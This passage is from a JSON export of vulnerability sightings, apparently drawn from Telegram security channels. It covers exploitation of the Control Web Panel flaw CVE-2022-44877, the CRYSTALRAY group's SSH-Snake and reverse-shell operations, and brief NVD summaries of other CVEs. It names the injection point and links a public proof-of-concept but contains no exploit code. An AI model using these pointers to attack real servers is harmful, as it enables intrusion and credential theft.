\u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0412\u0435\u0431-\u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a \u0432\u0435\u0431-\u043f\u0430\u043d\u0435\u043b\u044c CentOS, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0434\u043b\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c Linux.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u043e 0.9.8.1147 \u0438 \u0431\u044b\u043b\u0430\u00a0\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430\u00a0\u0435\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0449\u0438\u043c\u0438 25 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u041e\u0421 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0442\u0430\u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n\u0421\u043e\u043e\u0431\u0449\u0438\u0432\u0448\u0438\u0439 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u00a0\u041d\u0443\u043c\u0430\u043d \u0422\u044e\u0440\u043b\u0435\u00a0\u0438\u0437 Gais Cyber Security 3 \u044f\u043d\u0432\u0430\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (PoC) \u0438 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a, \u0430 \u0442\u0440\u0438 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Shadowserver Foundation \u0438\u00a0GreyNoise \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0412 Shadowserver \u0437\u0430\u044f\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430\u00bb.\n\n\u041f\u043e \u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u043c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 CVE-2022-44877 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430 \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043c\u0430\u0448\u0438\u043d\u043e\u0439. \u0414\u0440\u0443\u0433\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u043d\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043c\u0430\u0448\u0438\u043d.\n\nGreyNoise \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0438\u043c\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e\u00a0\u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP-\u0430\u0434\u0440\u0435\u0441\u0430, \u043f\u044b\u0442\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c CVE-2022-44877, \u0434\u0432\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 - \u0432 \u0421\u0428\u0410 \u0438 \u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 - \u0432 \u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u0430\u0445 \u0438 \u0422\u0430\u0438\u043b\u0430\u043d\u0434\u0435.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u043c \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u043c PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0441\u043b\u0435\u0433\u043a\u0430 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0434\u0430\u0447 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0412 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0438 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c CWP \u0434\u043e\u00a0\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f 0.9.8.1148, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.", "creation_timestamp": "2023-01-13T10:46:05.000000Z"}, {"uuid": "5ba4ba9c-c797-4f90-b13d-375a0b094cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/5965", "content": "Sysdig \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a \u043d\u043e\u0432\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b CRYSTALRAY, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u044b, \u0447\u0438\u0441\u043b\u043e \u0436\u0435\u0440\u0442\u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u043e \u0441\u043e 100 \u0434\u043e 1500.\n\nSysdig \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0441 \u0444\u0435\u0432\u0440\u0430\u043b\u044f, \u043a\u043e\u0433\u0434\u0430 \u043e\u043d\u0438\u00a0\u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438\u00a0\u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0438\u043c\u0438 \u0447\u0435\u0440\u0432\u044f \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c\u00a0SSH-Snake\u00a0\u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a \u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0430\u043c.\n\nSSH-snake - \u044d\u0442\u043e \u0447\u0435\u0440\u0432\u044c \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0440\u0430\u0434\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 SSH \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0445 \u0434\u043b\u044f \u043b\u0430\u0442\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0441\u0431\u0440\u0430\u0441\u044b\u0432\u0430\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c Sysdig, \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 CRYSTALRAY \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0441\u0432\u043e\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0432 10 \u0440\u0430\u0437, \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438 \u0441\u0442\u0430\u043b\u0438 1500 \u0447\u0435\u043b\u043e\u0432\u0435\u043a, \u0447\u044c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u044b\u043b\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u0432 \u0438\u0442\u043e\u0433\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b.\n\n\u041d\u043e\u0432\u0430\u044f \u0442\u0430\u043a\u0442\u0438\u043a\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 OSS, \u0432 \u0447\u0438\u0441\u043b\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 zmap, asn, httpx, nuclei, platypus.\n\n\u0426\u0435\u043b\u044c CRYSTALRAY - \u0441\u0431\u043e\u0440 \u0438 \u0432\u043e\u0437\u043c\u0435\u0437\u0434\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0441\u0442\u0438 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0436\u0435\u0440\u0442\u0432\u044b. \n\nSysdig \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e CRYSTALRAY \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 PoC, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0446\u0435\u043b\u044f\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f \u043f\u043e\u0441\u0442-\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Sliver.\n\n\u0421\u0440\u0435\u0434\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 CRYSTALRAY \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u0432\u043e\u0435\u0439 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438: CVE-2022-44877 (\u043e\u0448\u0438\u0431\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 Control Web Panel (CWP), CVE-2021-3129 (RCE-\u043e\u0448\u0438\u0431\u043a\u0430 d Ignition (Laravel) \u0438 CVE-2019-18394 (SSRF-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Ignite Realtime Openfire).\n\nSysdig \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f Atlassian Confluence, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044e\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u043c, \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043c\u043e\u0434\u0435\u043b\u044f\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432 \u0445\u043e\u0434\u0435 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0430\u0442\u0430\u043a \u043f\u0440\u043e\u0442\u0438\u0432 1800 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u0442\u0440\u0435\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0421\u0428\u0410.\n\nCRYSTALRAY \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u0435\u0431-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 Platypus \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0441\u0435\u0430\u043d\u0441\u043e\u0432 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u043d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c SSH-Snake \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u0442\u0438. \u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 SSH \u0447\u0435\u0440\u0432\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0445 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0432 \u043d\u043e\u0432\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0431\u044f \u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043d\u0430 \u043d\u043e\u0432\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\nSSH-Snake \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435, \u043d\u043e \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e bash \u043e\u0431\u0440\u0430\u0442\u043d\u043e \u043d\u0430 C2 CRYSTALRAY, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a.\n\n\u0412\u0441\u0435 \u043a\u0440\u0430\u0434\u0435\u043d\u043d\u043e\u0435 \u0437\u0430\u0442\u0435\u043c \u0441 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 SaaS-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0440\u0430\u0441\u043f\u0440\u043e\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u0434\u0430\u0440\u043a\u043d\u0435\u0442\u0435 \u0438\u043b\u0438 Telegram, \u043f\u0440\u0438\u043d\u043e\u0441\u044f \u0445\u043e\u0440\u043e\u0448\u0443\u044e \u043f\u0440\u0438\u0431\u044b\u043b\u044c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0434\u043b\u044f \u043c\u043e\u043d\u0435\u0442\u0430\u0437\u0438\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b.\n\n\u041f\u043e \u043c\u0435\u0440\u0435 \u0440\u043e\u0441\u0442\u0430 \u0443\u0433\u0440\u043e\u0437\u044b CRYSTALRAY \u043b\u0443\u0447\u0448\u0435\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0435\u0435 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e \u043c\u0435\u0440\u0435 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f.", "creation_timestamp": "2024-07-12T17:35:05.000000Z"}, {"uuid": "2ab30568-ecf3-4eb9-90fe-fb8b979ca07c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/crackcodes/2143", "content": "#exploit\n1. The OWASSRF + TabShell exploit chain\nhttps://blog.viettelcybersecurity.com/tabshell-owassrf\n\n2. CVE-2022-3515/CVE-2022-47629:\nInteger overflow bug Libksba\u00a0library (x.509)\nhttps://github.com/elttam/publications/blob/master/writeups/CVE-2022-47629.md \n\n3. CVE-2022-44877:\nCentos Web Panel 7 Unauthenticated RCE\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-15T13:34:14.000000Z"}, {"uuid": "00b26463-b4d7-4881-b055-22bc9736e299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44875", "type": "seen", "source": "https://t.me/cibsecurity/59449", "content": "\u203c CVE-2022-44875 \u203c\n\nKioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-03-06T07:12:31.000000Z"}, {"uuid": "76bbcf98-2f2d-4f1c-bd8a-7081ab6254da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44874", "type": "seen", "source": "https://t.me/cibsecurity/54489", "content": "\u203c CVE-2022-44874 \u203c\n\nwasm3 commit 7890a2097569fde845881e0b352d813573e371f9 was discovered to contain a segmentation fault via the component op_CallIndirect at /m3_exec.h.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-14T02:21:58.000000Z"}, {"uuid": "dfd96818-318a-4fa9-adbb-def8cdd28555", "vulnerability_lookup_origin": 